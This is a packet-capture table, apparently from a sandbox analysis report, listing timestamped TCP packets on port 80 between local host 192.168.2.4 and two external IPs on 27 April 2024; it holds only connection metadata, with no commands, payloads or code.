Apr 27, 2024 01:31:17.884716988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884751081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:17.884773016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:17.884829044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.028266907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028295040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028314114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028342009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028342009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028362989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028387070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028431892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028450012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028469086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028475046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028486967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028505087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028516054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028523922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028542042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028568029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028575897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028585911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028618097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028662920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028666973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028702021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028739929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028745890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028780937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028806925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028826952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028866053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028886080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028906107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.028944969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028990030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.028997898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029009104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029027939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029047966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029052973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029089928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029108047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029162884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029181957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029215097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029230118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029232979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029257059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029268026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029310942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029313087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029333115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029349089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029376030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029381990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029424906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029427052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029460907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029505968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029536009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029551029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029556036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029577971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029617071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029658079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029690027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029692888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029726028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029741049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029743910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029777050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029778957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029797077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029815912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029838085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029872894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029897928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029918909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.029954910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029973984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029992104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.029995918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030026913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030031919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030047894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030069113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030102015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030109882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030143976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030145884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030189991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030220985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030237913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030247927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030281067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030299902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030299902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030339956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030376911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030424118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030441999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030467033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030472040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030484915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030512094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030555964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030574083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030591965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030596972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030616999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030638933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030649900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030690908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030694962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030740976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030781984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030793905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030813932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030854940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030911922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030931950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.030972004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.030992985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031066895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031121969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031141996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031186104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031215906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031228065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031265974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031285048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031306982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031344891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031372070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031394005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031414986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031450033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031460047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031521082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031599998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031605959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031625986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031667948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031680107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031733990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031752110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031776905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031799078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031830072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031847954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031847954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031897068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.031934977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.031970978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.032001972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.032016039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.032093048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.032123089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.032143116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.054094076 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054186106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054219007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054269075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054282904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054302931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054352045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054371119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054390907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054409027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054435968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054449081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054475069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054910898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054930925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.054960966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054975033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.054994106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055026054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055039883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.055057049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055068016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.055104017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.055121899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055140972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055166960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.055177927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.055192947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055234909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.055321932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055341959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.055366993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.055378914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.063538074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.063726902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.223465919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223531008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223572016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223582983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.223613024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223654032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223694086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223721981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.223735094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223742962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.223793983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223831892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223870039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223884106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.223907948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223915100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.223947048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.223984003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224039078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224076986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224087954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224127054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224145889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224184990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224201918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224224091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224261999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224298954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224309921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224338055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224356890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224376917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224415064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224451065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224478006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224489927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224498034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224529028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224569082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224607944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224644899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224644899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224670887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224685907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224724054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224737883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224764109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224802971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224839926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224855900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224879026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224888086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.224915981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224952936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224992037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.224998951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225030899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225040913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225071907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225112915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225121975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225151062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225189924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225228071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225235939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225265980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225275993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225302935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225341082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225377083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225389004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225416899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225431919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225456953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225496054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225543022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225553989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225581884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225608110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225624084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225662947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225667000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225702047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225739956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225778103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225779057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225816965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225853920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225862026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225895882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225912094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.225936890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.225976944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226005077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226020098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226058006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226066113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226097107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226135015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.226149082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226174116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.226207018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.226238966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.226274967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.226315022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.226341963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.226375103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.226399899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.226438046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226459980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.226495981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226535082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226572990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226577997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226610899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226650000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226660013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226686954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.226696014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226725101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226748943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.226783991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226823092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226835012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226862907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226900101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.226937056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.226953030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.226974010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:18.227004051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227041960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227052927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.227081060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227117062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:18.227154970 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:18.227169991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:18.227193117 CEST	80	49733	185.172.128.76	192.168.2.4
